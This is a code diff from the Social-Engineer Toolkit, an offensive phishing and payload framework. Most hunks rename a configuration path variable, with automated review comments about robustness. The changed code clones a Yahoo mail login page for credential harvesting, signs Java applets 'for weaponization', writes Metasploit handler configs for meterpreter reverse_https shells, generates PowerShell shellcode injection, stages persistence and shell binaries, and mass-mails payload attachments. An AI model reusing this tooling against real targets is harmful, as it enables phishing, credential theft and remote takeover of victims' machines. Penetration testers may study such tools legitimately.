subprocess.Popen("cp %s/src/html/*.bin %s 1> /dev/null 2> /dev/null;cp %s/src/html/*.html %s 1> /dev/null 2> /dev/null;cp %s/web_clone/* %s 1> /dev/null 2> /dev/null;cp %s/msf.exe %s 1> /dev/null 2> /dev/null;cp %s/*.jar %s 1> /dev/null 2> /dev/null" % subprocess.Popen("cp %s/src/html/*.bin %s 1> /dev/null 2> /dev/null;cp %s/src/html/*.html %s 1> /dev/null 2> /dev/null;cp %s/web_clone/* %s 1> /dev/null 2> /dev/null;cp %s/msf.exe %s 1> /dev/null 2> /dev/null;cp %s/*.jar %s 1> /dev/null 2> /dev/null" %
(definepath, apache_path, definepath, apache_path, setdir, apache_path, setdir, apache_path, setdir, apache_path), shell=True).wait() (definepath, apache_path, definepath, apache_path, userconfigpath, apache_path, userconfigpath, apache_path, userconfigpath, apache_path), shell=True).wait()
# if we are tracking users # if we are tracking users
if track_email == "on": if track_email == "on":
now = datetime.datetime.today() now = datetime.datetime.today()
@ -395,15 +395,15 @@ web_server = check_config("WEB_PORT=")
# setup multi attack options here # setup multi attack options here
multiattack = "off" multiattack = "off"
if os.path.isfile(setdir + "/multi_tabnabbing"): if os.path.isfile(userconfigpath + "multi_tabnabbing"):
multiattack = "on" multiattack = "on"
if os.path.isfile(setdir + "/multi_harvester"): if os.path.isfile(userconfigpath + "multi_harvester"):
multiattack = "on" multiattack = "on"
# Grab custom or set defined # Grab custom or set defined
template = "" template = ""
if os.path.isfile(setdir + "/site.template"): if os.path.isfile(userconfigpath + "site.template"):
fileopen = open(setdir + "/site.template", "r").readlines() fileopen = open(userconfigpath + "site.template", "r").readlines()
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
match = re.search("TEMPLATE=", line) match = re.search("TEMPLATE=", line)
@ -532,8 +532,8 @@ try:
print(( print((
bcolors.GREEN + "[--] Apache web server is currently in use for performance. [--]" + bcolors.ENDC)) bcolors.GREEN + "[--] Apache web server is currently in use for performance. [--]" + bcolors.ENDC))
if os.path.isfile(setdir + "/meta_config"): if os.path.isfile(userconfigpath + "meta_config"):
fileopen = open(setdir + "/meta_config", "r") fileopen = open(userconfigpath + "meta_config", "r")
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
match = re.search("set SRVPORT 80", line) match = re.search("set SRVPORT 80", line)
@ -550,8 +550,8 @@ try:
web_server_start() web_server_start()
# if we are using ettercap # if we are using ettercap
if os.path.isfile(setdir + "/ettercap"): if os.path.isfile(userconfigpath + "ettercap"):
fileopen5 = open(setdir + "/ettercap", "r") fileopen5 = open(userconfigpath + "ettercap", "r")
for line in fileopen5: for line in fileopen5:
ettercap = line.rstrip() ettercap = line.rstrip()
# run in background # run in background
@ -561,7 +561,7 @@ try:
stderr=subprocess.PIPE, stdout=subprocess.PIPE) stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# if metasploit config is in directory # if metasploit config is in directory
if os.path.isfile(setdir + "/meta_config"): if os.path.isfile(userconfigpath + "meta_config"):
print_info("Launching MSF Listener...") print_info("Launching MSF Listener...")
print_info("This may take a few to load MSF...") print_info("This may take a few to load MSF...")
# this checks to see if we want to start a listener # this checks to see if we want to start a listener
@ -573,12 +573,12 @@ try:
import pexpect import pexpect
# specify if we are using the multi pyinjector # specify if we are using the multi pyinjector
meta_config = "meta_config" meta_config = "meta_config"
if os.path.isfile(setdir + "/meta_config_multipyinjector"): if os.path.isfile(userconfigpath + "meta_config_multipyinjector"):
meta_config = "meta_config_multipyinjector" meta_config = "meta_config_multipyinjector"
# if we arent using a custom payload # if we arent using a custom payload
if custom != 1: if custom != 1:
child1 = pexpect.spawn( child1 = pexpect.spawn(
"%smsfconsole -r %s/%s\r\n\r\n" % (msf_path, setdir, meta_config)) "%smsfconsole -r %s/%s\r\n\r\n" % (msf_path, userconfigpath, meta_config))
# check if we want to deliver emails or track users that click the # check if we want to deliver emails or track users that click the
# link # link
webattack_email = check_config("WEBATTACK_EMAIL=").lower() webattack_email = check_config("WEBATTACK_EMAIL=").lower()
@ -592,11 +592,11 @@ try:
if custom != 1: if custom != 1:
child1.interact() child1.interact()
if os.path.isfile(setdir + "/set.payload"): if os.path.isfile(userconfigpath + "set.payload"):
port = check_options("PORT=") port = check_options("PORT=")
# grab configuration # grab configuration
fileopen = open(setdir + "/set.payload", "r") fileopen = open(userconfigpath + "set.payload", "r")
for line in fileopen: for line in fileopen:
set_payload = line.rstrip() set_payload = line.rstrip()
@ -627,12 +627,12 @@ try:
# if not then run it in windows # if not then run it in windows
if operating_system == "windows": if operating_system == "windows":
if not os.path.isfile(setdir + "/ratteserver.exe"): if not os.path.isfile(userconfigpath + "ratteserver.exe"):
shutil.copyfile( shutil.copyfile(
"../../payloads/ratte/ratteserver.binary", setdir + "/ratteserver.exe") "../../payloads/ratte/ratteserver.binary", userconfigpath + "ratteserver.exe")
shutil.copyfile( shutil.copyfile(
"../../payloads/ratte/cygwin1.dll", setdir + "/cygwin1.dll") "../../payloads/ratte/cygwin1.dll", userconfigpath + "cygwin1.dll")
os.system(setdir + "/ratteserver %s" % (definepath, port)) os.system(userconfigpath + "ratteserver %s" % (definepath, port))
# handle errors # handle errors
except Exception as e: except Exception as e:


@ -73,13 +73,13 @@ if choice == "5":
shutil.copyfile("src/html/templates/yahoo/index.template", "src/html/index.template") shutil.copyfile("src/html/templates/yahoo/index.template", "src/html/index.template")
url = "http://mail.yahoo.com" url = "http://mail.yahoo.com"
if not os.path.isdir(os.path.join(core.setdir, "web_clone")): if not os.path.isdir(os.path.join(core.userconfigpath, "web_clone")):
os.makedirs(os.path.join(core.setdir, "web_clone/")) os.makedirs(os.path.join(core.userconfigpath, "web_clone/"))
if os.path.isfile(os.path.join(core.setdir, "web_clone/index.html")): if os.path.isfile(os.path.join(core.userconfigpath, "web_clone/index.html")):
os.remove(os.path.join(core.setdir, "web_clone/index.html")) os.remove(os.path.join(core.userconfigpath, "web_clone/index.html"))
shutil.copyfile("src/html/index.template", os.path.join(core.setdir, "web_clone/index.html")) shutil.copyfile("src/html/index.template", os.path.join(core.userconfigpath, "web_clone/index.html"))
with open(os.path.join(core.setdir, "site.template"), 'w') as filewrite: with open(os.path.join(core.userconfigpath, "site.template"), 'w') as filewrite:
filewrite.write("TEMPLATE=SELF\nURL={0}".format(url)) filewrite.write("TEMPLATE=SELF\nURL={0}".format(url))
core.debug_msg(core.mod_name(), "exiting src.html.templates.template'", 1) core.debug_msg(core.mod_name(), "exiting src.html.templates.template'", 1)


@ -49,7 +49,7 @@ subprocess.Popen("jarsigner -keystore mykeystore "
# move it into our html directory # move it into our html directory
subprocess.Popen("cp Signed_Update.jar ../", shell=True).wait() subprocess.Popen("cp Signed_Update.jar ../", shell=True).wait()
subprocess.Popen("mv Signed_Update.jar {0}".format(core.setdir), shell=True) subprocess.Popen("mv Signed_Update.jar {0}".format(core.userconfigpath), shell=True)
# move back to original directory # move back to original directory
os.chdir("../../../") os.chdir("../../../")
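Review bot: The `subprocess.Popen("mv Signed_Update.jar {0}".format(core.userconfigpath), shell=True)` line is spawned without `.wait()`, unlike the `cp` directly above it, so the script proceeds to `os.chdir("../../../")` and whatever follows while the move may still be in flight; any later step that expects the jar to already be in the user config directory can race it. The path is also interpolated unquoted into a `shell=True` string, so a config directory containing a space or shell metacharacter would break the command. A synchronous, shell-free replacement is `shutil.move("Signed_Update.jar", core.userconfigpath)` (assuming `shutil` is in scope in this module; it is not visible in the hunk). The enclosing statement run starts before the hunk.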


@ -82,8 +82,8 @@ if firstprompt == "1":
# import into SET # import into SET
core.print_status("Importing the applet into SET for weaponization...") core.print_status("Importing the applet into SET for weaponization...")
shutil.copyfile(newpath, os.path.join(core.setdir, "Signed_Update.jar.orig")) shutil.copyfile(newpath, os.path.join(core.userconfigpath, "Signed_Update.jar.orig"))
shutil.copyfile(newpath, os.path.join(core.setdir, "Signed_Update.jar")) shutil.copyfile(newpath, os.path.join(core.userconfigpath, "Signed_Update.jar"))
core.print_status("The applet has been successfully imported into SET.") core.print_status("The applet has been successfully imported into SET.")
# if we want to either generate a certificate or use our own certificate # if we want to either generate a certificate or use our own certificate
@ -185,6 +185,6 @@ if firstprompt == "2":
# sign the applet with the imported certificate # sign the applet with the imported certificate
subprocess.Popen("jarsigner -signedjar Signed_Update.jar {0} MyCert".format(os.path.join(definepath, "src/html/unsigned/unsigned.jar")), shell=True).wait() subprocess.Popen("jarsigner -signedjar Signed_Update.jar {0} MyCert".format(os.path.join(definepath, "src/html/unsigned/unsigned.jar")), shell=True).wait()
# move it into our html directory # move it into our html directory
subprocess.Popen("mv Signed_Update.jar {0}".format(os.path.join(core.setdir, "Signed_Update.jar.orig")), shell=True).wait() subprocess.Popen("mv Signed_Update.jar {0}".format(os.path.join(core.userconfigpath, "Signed_Update.jar.orig")), shell=True).wait()
# move back to original directory # move back to original directory
core.print_status("Java Applet is now signed and will be imported into the java applet website attack from now on...") core.print_status("Java Applet is now signed and will be imported into the java applet website attack from now on...")


@ -26,7 +26,7 @@ auto_migrate = check_config("AUTO_MIGRATE=")
pyinjection = check_options("PYINJECTION=") pyinjection = check_options("PYINJECTION=")
if pyinjection == "ON": if pyinjection == "ON":
# check to ensure that the payload options were specified right # check to ensure that the payload options were specified right
if os.path.isfile(setdir + "/payload_options.shellcode"): if os.path.isfile(userconfigpath + "payload_options.shellcode"):
pyinjection = "on" pyinjection = "on"
print_status( print_status(
"Multi/Pyinjection was specified. Overriding config options.") "Multi/Pyinjection was specified. Overriding config options.")
@ -56,7 +56,7 @@ if validate_ip(ipaddr) == False:
# prompt what port to listen on for powershell then make an append to the current # prompt what port to listen on for powershell then make an append to the current
# metasploit answer file # metasploit answer file
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
# if we have multi injection on, don't worry about these # if we have multi injection on, don't worry about these
if multi_injection != "on": if multi_injection != "on":
if pyinjection == "off": if pyinjection == "off":
@ -66,12 +66,12 @@ if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
["4"], "Enter the port for Metasploit to listen on for powershell [443]")) ["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "": if port == "":
port = "443" port = "443"
fileopen = open("%s/meta_config_multipyinjector" % (setdir), "r") fileopen = open("%s/meta_config_multipyinjector" % (userconfigpath), "r")
data = fileopen.read() data = fileopen.read()
match = re.search(port, data) match = re.search(port, data)
if not match: if not match:
filewrite = open( filewrite = open(
"%s/meta_config_multipyinjector" % (setdir), "a") "%s/meta_config_multipyinjector" % (userconfigpath), "a")
filewrite.write("\nuse exploit/multi/handler\n") filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON": if auto_migrate == "ON":
filewrite.write( filewrite.write(
@ -84,7 +84,7 @@ if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
if multi_injection != "on": if multi_injection != "on":
if pyinjection == "off": if pyinjection == "off":
# check to see if the meta config multi pyinjector is there # check to see if the meta config multi pyinjector is there
if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): if not os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
if check_options("PORT=") != 0: if check_options("PORT=") != 0:
port = check_options("PORT=") port = check_options("PORT=")
# if port.options isnt there then prompt # if port.options isnt there then prompt
@ -128,12 +128,12 @@ if multi_injection == "on":
generate_powershell_alphanumeric_payload( generate_powershell_alphanumeric_payload(
powershell_inject_x86, ipaddr, ports, x86) powershell_inject_x86, ipaddr, ports, x86)
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
port_check = check_ports( port_check = check_ports(
"%s/meta_config_multipyinjector" % (setdir), ports) "%s/meta_config_multipyinjector" % (userconfigpath), ports)
if port_check == False: if port_check == False:
filewrite = open( filewrite = open(
"%s/meta_config_multipyinjector" % (setdir), "a") "%s/meta_config_multipyinjector" % (userconfigpath), "a")
filewrite.write("\nuse exploit/multi/handler\n") filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON": if auto_migrate == "ON":
filewrite.write( filewrite.write(
@ -143,15 +143,15 @@ if multi_injection == "on":
filewrite.close() filewrite.close()
# if we aren't using multi pyinjector # if we aren't using multi pyinjector
if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): if not os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
# if meta config isn't created yet then create it # if meta config isn't created yet then create it
if not os.path.isfile("%s/meta_config" % (setdir)): if not os.path.isfile("%s/meta_config" % (userconfigpath)):
filewrite = open("%s/meta_config" % (setdir), "w") filewrite = open("%s/meta_config" % (userconfigpath), "w")
filewrite.write("") filewrite.write("")
filewrite.close() filewrite.close()
port_check = check_ports("%s/meta_config" % (setdir), ports) port_check = check_ports("%s/meta_config" % (userconfigpath), ports)
if port_check == False: if port_check == False:
filewrite = open("%s/meta_config" % (setdir), "a") filewrite = open("%s/meta_config" % (userconfigpath), "a")
filewrite.write("\nuse exploit/multi/handler\n") filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON": if auto_migrate == "ON":
filewrite.write( filewrite.write(
@ -164,7 +164,7 @@ if multi_injection == "on":
if pyinjection == "on": if pyinjection == "on":
multi_injection_x86 = "" multi_injection_x86 = ""
# read in the file we need for parsing # read in the file we need for parsing
fileopen = open(setdir + "/payload_options.shellcode", "r") fileopen = open(userconfigpath + "payload_options.shellcode", "r")
payloads = fileopen.read()[:-1].rstrip() # strips an extra , payloads = fileopen.read()[:-1].rstrip() # strips an extra ,
payloads = payloads.split(",") payloads = payloads.split(",")
# format: payload<space>port # format: payload<space>port
@ -196,7 +196,7 @@ if verbose.lower() == "on":
time.sleep(3) time.sleep(3)
print(x86) print(x86)
filewrite = open("%s/x86.powershell" % (setdir), "w") filewrite = open("%s/x86.powershell" % (userconfigpath), "w")
filewrite.write(x86) filewrite.write(x86)
filewrite.close() filewrite.close()
print_status("Finished generating powershell injection bypass.") print_status("Finished generating powershell injection bypass.")
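Review bot: The new code mixes two path-building conventions that only agree by accident: `userconfigpath + "payload_options.shellcode"` (the `if os.path.isfile(userconfigpath + ...)` and `fileopen = open(userconfigpath + ...)` lines) relies on the renamed variable presumably ending in a separator, while `"%s/meta_config_multipyinjector" % (userconfigpath)`, the `meta_config` format strings and `"%s/x86.powershell" % (userconfigpath)` add their own, producing a double slash. POSIX tolerates `//`, but if `userconfigpath` ever loses its trailing slash the concatenation form silently points at a sibling path (e.g. `…/setpayload_options.shellcode`) and the `isfile` checks quietly take the other branch with no error. `os.path.join(userconfigpath, "meta_config_multipyinjector")` is correct in both cases and is already the form this commit uses in other files. The same split appears in the later sections touching `uac.address`/`system.address`, the `template.*` attachments, `meta_config`/`payload.options`, and the `reports/powershell` paths.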


@ -17,10 +17,10 @@ definepath = os.getcwd()
sys.path.append(definepath) sys.path.append(definepath)
# cleanup # cleanup
if os.path.isfile(setdir + "/uac.address"): if os.path.isfile(userconfigpath + "uac.address"):
os.remove(setdir + "/uac.address") os.remove(userconfigpath + "uac.address")
if os.path.isfile(setdir + "/system.address"): if os.path.isfile(userconfigpath + "system.address"):
os.remove(setdir + "/system.address") os.remove(userconfigpath + "system.address")
# will remove this later # will remove this later
core_modules = True core_modules = True
@ -863,9 +863,9 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
time.sleep(0.5) time.sleep(0.5)
# write out system # write out system
if os.path.isfile("%s/system.address" % (setdir)): if os.path.isfile("%s/system.address" % (userconfigpath)):
os.remove("%s/system.address" % (setdir)) os.remove("%s/system.address" % (userconfigpath))
filewrite = open("%s/system.address" % (setdir), "w") filewrite = open("%s/system.address" % (userconfigpath), "w")
filewrite.write(addr) filewrite.write(addr)
filewrite.close() filewrite.close()
@ -882,9 +882,9 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
# had to do some funky stuff here because global vars are not working properly # had to do some funky stuff here because global vars are not working properly
# inside threads, so the information cant be passed to # inside threads, so the information cant be passed to
# normal outside routines # normal outside routines
if os.path.isfile(setdir + "/uac.address"): if os.path.isfile(userconfigpath + "uac.address"):
os.remove(setdir + "/uac.address") os.remove(userconfigpath + "uac.address")
filewrite = open(setdir + "/uac.address", "w") filewrite = open(userconfigpath + "uac.address", "w")
filewrite.write(addr) filewrite.write(addr)
filewrite.close() filewrite.close()
@ -1033,9 +1033,9 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
if os.path.isfile("src/payloads/set_payloads/persistence.binary"): if os.path.isfile("src/payloads/set_payloads/persistence.binary"):
if core_modules == True: if core_modules == True:
subprocess.Popen( subprocess.Popen(
"cp src/payloads/set_payloads/persistence.binary %s" % (setdir), shell=True).wait() "cp src/payloads/set_payloads/persistence.binary %s" % (userconfigpath), shell=True).wait()
upx("%s/persistence.binary" % (setdir)) upx("%s/persistence.binary" % (userconfigpath))
upload = "%s/persistence.binary" % (setdir) upload = "%s/persistence.binary" % (userconfigpath)
if core_modules == False: if core_modules == False:
upload = "src/payloads/set_payloads/persistence.binary" upload = "src/payloads/set_payloads/persistence.binary"
@ -1085,9 +1085,9 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
if os.path.isfile("src/payloads/set_payloads/shell.windows"): if os.path.isfile("src/payloads/set_payloads/shell.windows"):
if core_modules == True: if core_modules == True:
subprocess.Popen( subprocess.Popen(
"cp src/payloads/set_payloads/shell.windows %s" % (setdir), shell=True).wait() "cp src/payloads/set_payloads/shell.windows %s" % (userconfigpath), shell=True).wait()
upx(setdir + "/shell.windows") upx(userconfigpath + "shell.windows")
upload = setdir + "/shell.windows" upload = userconfigpath + "shell.windows"
if core_modules == False: if core_modules == False:
upload = "src/payloads/set_payloads/shell.windows" upload = "src/payloads/set_payloads/shell.windows"
@ -1437,8 +1437,8 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
# if we have a windows shell # if we have a windows shell
if data == "IHAYYYYYIAMSETANDIAMWINDOWS": if data == "IHAYYYYYIAMSETANDIAMWINDOWS":
if os.path.isfile(setdir + "/system.address"): if os.path.isfile(userconfigpath + "system.address"):
fileopen = open(setdir + "/system.address", "r") fileopen = open(userconfigpath + "system.address", "r")
system = fileopen.read().rstrip() system = fileopen.read().rstrip()
system = system.replace(":WINDOWS", "") system = system.replace(":WINDOWS", "")
system = system.replace(":UAC-SAFE", "") system = system.replace(":UAC-SAFE", "")
@ -1446,8 +1446,8 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
temp_addr = str(addr[0] + ":WINDOWS:SYSTEM") temp_addr = str(addr[0] + ":WINDOWS:SYSTEM")
bypass_counter = 1 bypass_counter = 1
if os.path.isfile(setdir + "/uac.address"): if os.path.isfile(userconfigpath + "uac.address"):
fileopen = open(setdir + "/uac.address", "r") fileopen = open(userconfigpath + "uac.address", "r")
uac = fileopen.read().rstrip() uac = fileopen.read().rstrip()
uac = uac.replace(":WINDOWS", "") uac = uac.replace(":WINDOWS", "")
if str(addr[0]) == str(uac): if str(addr[0]) == str(uac):
@ -1479,12 +1479,12 @@ Example: shellcode <enter> - Then paste your shellcode \x41\x41\etc
# reset value # reset value
# if uac != None: # if uac != None:
if os.path.isfile(setdir + "/uac.address"): if os.path.isfile(userconfigpath + "uac.address"):
os.remove(setdir + "/uac.address") os.remove(userconfigpath + "uac.address")
bypass_counter = 0 bypass_counter = 0
if os.path.isfile(setdir + "/system.address"): if os.path.isfile(userconfigpath + "system.address"):
os.remove(setdir + "/system.address") os.remove(userconfigpath + "system.address")
bypass_counter = 0 bypass_counter = 0
if addr[0] != "127.0.0.1": if addr[0] != "127.0.0.1":
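Review bot: The changed `fileopen = open(userconfigpath + "system.address", "r")` and `fileopen = open(userconfigpath + "uac.address", "r")` lines never close the handle; from the `data == "IHAYYYYYIAMSETANDIAMWINDOWS"` branch and the `addr[0]` checks this looks like it runs once per received message, so each connection leaks a descriptor until the garbage collector happens to reclaim it. `with open(userconfigpath + "system.address", "r") as fileopen: system = fileopen.read().rstrip()` (and the same for `uac.address`) closes deterministically with no other change. The same unclosed-`open()` pattern is on the `meta_config_multipyinjector` read in the earlier powershell section and the `payload.options` read in the mass-mailer section. The enclosing function or loop starts before and ends after the hunk.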


@ -109,41 +109,41 @@ print_info(
"As an added bonus, use the file-format creator in SET to create your attachment.") "As an added bonus, use the file-format creator in SET to create your attachment.")
counter = 0 counter = 0
# PDF Previous # PDF Previous
if os.path.isfile(setdir + "/template.pdf"): if os.path.isfile(userconfigpath + "template.pdf"):
if os.path.isfile(setdir + "/template.rar"): if os.path.isfile(userconfigpath + "template.rar"):
if os.path.isfile(setdir + "/template.zip"): if os.path.isfile(userconfigpath + "template.zip"):
print_warning("Multiple payloads were detected:") print_warning("Multiple payloads were detected:")
print ("1. PDF Payload\n2. VBS Payload\n3. Zipfile Payload\n\n") print ("1. PDF Payload\n2. VBS Payload\n3. Zipfile Payload\n\n")
choose_payload = input(setprompt("0", "")) choose_payload = input(setprompt("0", ""))
if choose_payload == '1': if choose_payload == '1':
file_format = (setdir + "/template.pdf") file_format = (userconfigpath + "template.pdf")
if choose_payload == '2': if choose_payload == '2':
file_format = (setdir + "/template.rar") file_format = (userconfigpath + "template.rar")
if choose_payload == '3': if choose_payload == '3':
file_format = (setdir + "/template.zip") file_format = (userconfigpath + "template.zip")
counter = 1 counter = 1
if counter == 0: if counter == 0:
if os.path.isfile(setdir + "/template.pdf"): if os.path.isfile(userconfigpath + "template.pdf"):
file_format = (setdir + "/template.pdf") file_format = (userconfigpath + "template.pdf")
if os.path.isfile(setdir + "/template.rar"): if os.path.isfile(userconfigpath + "template.rar"):
file_format = (setdir + "/template.rar") file_format = (userconfigpath + "template.rar")
if os.path.isfile(setdir + "/template.zip"): if os.path.isfile(userconfigpath + "template.zip"):
file_format = (setdir + "/template.zip") file_format = (userconfigpath + "template.zip")
if os.path.isfile(setdir + "/template.doc"): if os.path.isfile(userconfigpath + "template.doc"):
file_format = (setdir + "/template.doc") file_format = (userconfigpath + "template.doc")
if os.path.isfile(setdir + "/template.rtf"): if os.path.isfile(userconfigpath + "template.rtf"):
file_format = (setdir + "/template.rtf") file_format = (userconfigpath + "template.rtf")
if os.path.isfile(setdir + "/template.mov"): if os.path.isfile(userconfigpath + "template.mov"):
file_format = (setdir + "/template.mov") file_format = (userconfigpath + "template.mov")
# Determine if prior payload created # Determine if prior payload created
if not os.path.isfile(setdir + "/template.pdf"): if not os.path.isfile(userconfigpath + "template.pdf"):
if not os.path.isfile(setdir + "/template.rar"): if not os.path.isfile(userconfigpath + "template.rar"):
if not os.path.isfile(setdir + "/template.zip"): if not os.path.isfile(userconfigpath + "template.zip"):
if not os.path.isfile(setdir + "/template.doc"): if not os.path.isfile(userconfigpath + "template.doc"):
if not os.path.isfile(setdir + "/template.rtf"): if not os.path.isfile(userconfigpath + "template.rtf"):
if not os.path.isfile(setdir + "/template.mov"): if not os.path.isfile(userconfigpath + "template.mov"):
print("No previous payload created.") print("No previous payload created.")
file_format = input( file_format = input(
setprompt(["1"], "Enter the file to use as an attachment")) setprompt(["1"], "Enter the file to use as an attachment"))
@ -175,8 +175,8 @@ if filename1 == '1' or filename1 == '':
if filename1 == '2': if filename1 == '2':
filename1 = input(setprompt(["1"], "New filename")) filename1 = input(setprompt(["1"], "New filename"))
subprocess.Popen("cp %s %s/%s 1> /dev/null 2> /dev/null" % subprocess.Popen("cp %s %s/%s 1> /dev/null 2> /dev/null" %
(file_format, setdir, filename1), shell=True).wait() (file_format, userconfigpath, filename1), shell=True).wait()
file_format = ("%s/%s" % (setdir, filename1)) file_format = ("%s/%s" % (userconfigpath, filename1))
print_status("Filename changed, moving on...") print_status("Filename changed, moving on...")
print (""" print ("""
@ -210,7 +210,7 @@ if option1 == '1' or option1 == '2':
if template_choice == '1': if template_choice == '1':
# set path for # set path for
path = 'src/templates/' path = 'src/templates/'
filewrite = open(setdir + "/email.templates", "w") filewrite = open(userconfigpath + "email.templates", "w")
counter = 0 counter = 0
# Pull all files in the templates directory # Pull all files in the templates directory
for infile in glob.glob(os.path.join(path, '*.template')): for infile in glob.glob(os.path.join(path, '*.template')):
@ -223,7 +223,7 @@ if option1 == '1' or option1 == '2':
# close the file # close the file
filewrite.close() filewrite.close()
# read in formatted filenames # read in formatted filenames
fileread = open(setdir + "/email.templates", "r").readlines() fileread = open(userconfigpath + "email.templates", "r").readlines()
print_info("Available templates:") print_info("Available templates:")
for line in fileread: for line in fileread:
line = line.rstrip() line = line.rstrip()
@ -459,31 +459,31 @@ if option1 == '2':
email_num = email_num + 1 email_num = email_num + 1
print(" Sent e-mail number: " + (str(email_num))) print(" Sent e-mail number: " + (str(email_num)))
if not os.path.isfile(setdir + "/template.zip"): if not os.path.isfile(userconfigpath + "template.zip"):
print_status("SET has finished delivering the emails") print_status("SET has finished delivering the emails")
question1 = yesno_prompt(["1"], "Setup a listener [yes|no]") question1 = yesno_prompt(["1"], "Setup a listener [yes|no]")
if question1 == 'YES': if question1 == 'YES':
if not os.path.isfile(setdir + "/payload.options"): if not os.path.isfile(userconfigpath + "payload.options"):
if not os.path.isfile(setdir + "/meta_config"): if not os.path.isfile(userconfigpath + "meta_config"):
if not os.path.isfile(setdir + "/unc_config"): if not os.path.isfile(userconfigpath + "unc_config"):
print_error( print_error(
"Sorry, you did not generate your payload through SET, this option is not supported.") "Sorry, you did not generate your payload through SET, this option is not supported.")
if os.path.isfile(setdir + "/unc_config"): if os.path.isfile(userconfigpath + "unc_config"):
child = pexpect.spawn( child = pexpect.spawn(
"%smsfconsole -r %s/unc_config" % (meta_path, setdir)) "%smsfconsole -r %s/unc_config" % (meta_path, userconfigpath))
try: try:
child.interact() child.interact()
except Exception: except Exception:
child.close() child.close()
if os.path.isfile(setdir + "/payload.options"): if os.path.isfile(userconfigpath + "payload.options"):
fileopen = open(setdir + "/payload.options", "r").readlines() fileopen = open(userconfigpath + "payload.options", "r").readlines()
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
line = line.split(" ") line = line.split(" ")
# CREATE THE LISTENER HERE # CREATE THE LISTENER HERE
filewrite = open(setdir + "/meta_config", "w") filewrite = open(userconfigpath + "meta_config", "w")
filewrite.write("use exploit/multi/handler\n") filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD " + line[0] + "\n") filewrite.write("set PAYLOAD " + line[0] + "\n")
filewrite.write("set LHOST " + line[1] + "\n") filewrite.write("set LHOST " + line[1] + "\n")
@ -493,7 +493,7 @@ if not os.path.isfile(setdir + "/template.zip"):
filewrite.write("exploit -j\r\n\r\n") filewrite.write("exploit -j\r\n\r\n")
filewrite.close() filewrite.close()
child = pexpect.spawn( child = pexpect.spawn(
"%smsfconsole -r %s/meta_config" % (meta_path, setdir)) "%smsfconsole -r %s/meta_config" % (meta_path, userconfigpath))
try: try:
child.interact() child.interact()
except Exception: except Exception:
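Review bot: The renamed attachment copy, `subprocess.Popen("cp %s %s/%s 1> /dev/null 2> /dev/null" % (file_format, userconfigpath, filename1), shell=True).wait()`, splices the operator-typed `filename1` (and `file_format`, which may also be typed in) unquoted into a shell command, so a name with a space or quote simply fails and stderr is discarded so nothing reports it. `shutil.copyfile(file_format, os.path.join(userconfigpath, filename1))` followed by `file_format = os.path.join(userconfigpath, filename1)` does the same work without a shell and also drops the double slash that `"%s/%s" % (userconfigpath, filename1)` produces when `userconfigpath` already ends in one (assuming `shutil` is imported in this module). The six nested `if not os.path.isfile(userconfigpath + "template.…")` checks further up the section would read more clearly as a single `any(...)` over the extension list. The enclosing statement run starts before the hunk.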


@ -40,7 +40,7 @@ if powershell_menu_choice != "99":
core.update_options("POWERSHELL_SOLO=ON") core.update_options("POWERSHELL_SOLO=ON")
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
with open(core.setdir + "/payload_options.shellcode", "w") as filewrite: with open(core.userconfigpath + "payload_options.shellcode", "w") as filewrite:
filewrite.write("windows/meterpreter/reverse_https {},".format(port)) filewrite.write("windows/meterpreter/reverse_https {},".format(port))
try: try:
@ -51,15 +51,15 @@ if powershell_menu_choice != "99":
#prep_powershell_payload() #prep_powershell_payload()
# create the directory if it does not exist # create the directory if it does not exist
if not os.path.isdir(core.setdir + "/reports/powershell"): if not os.path.isdir(core.userconfigpath + "reports/powershell"):
os.makedirs(core.setdir + "/reports/powershell") os.makedirs(core.userconfigpath + "reports/powershell")
# here we format everything for us # here we format everything for us
with open(core.setdir + "/x86.powershell") as fileopen: with open(core.userconfigpath + "x86.powershell") as fileopen:
x86 = fileopen.read() x86 = fileopen.read()
x86 = core.powershell_encodedcommand(x86) x86 = core.powershell_encodedcommand(x86)
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell/"))) core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.userconfigpath, "reports/powershell/")))
with open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") as filewrite: with open(core.userconfigpath + "reports/powershell/x86_powershell_injection.txt", "w") as filewrite:
filewrite.write(x86) filewrite.write(x86)
choice = core.yesno_prompt("0", "Do you want to start the listener now [yes/no]: ") choice = core.yesno_prompt("0", "Do you want to start the listener now [yes/no]: ")
@ -68,7 +68,7 @@ if powershell_menu_choice != "99":
# if we want to start the listener # if we want to start the listener
if choice == 'YES': if choice == 'YES':
with open(core.setdir + "/reports/powershell/powershell.rc", "w") as filewrite: with open(core.userconfigpath + "reports/powershell/powershell.rc", "w") as filewrite:
filewrite.write("use multi/handler\n" filewrite.write("use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n" "set payload windows/meterpreter/reverse_https\n"
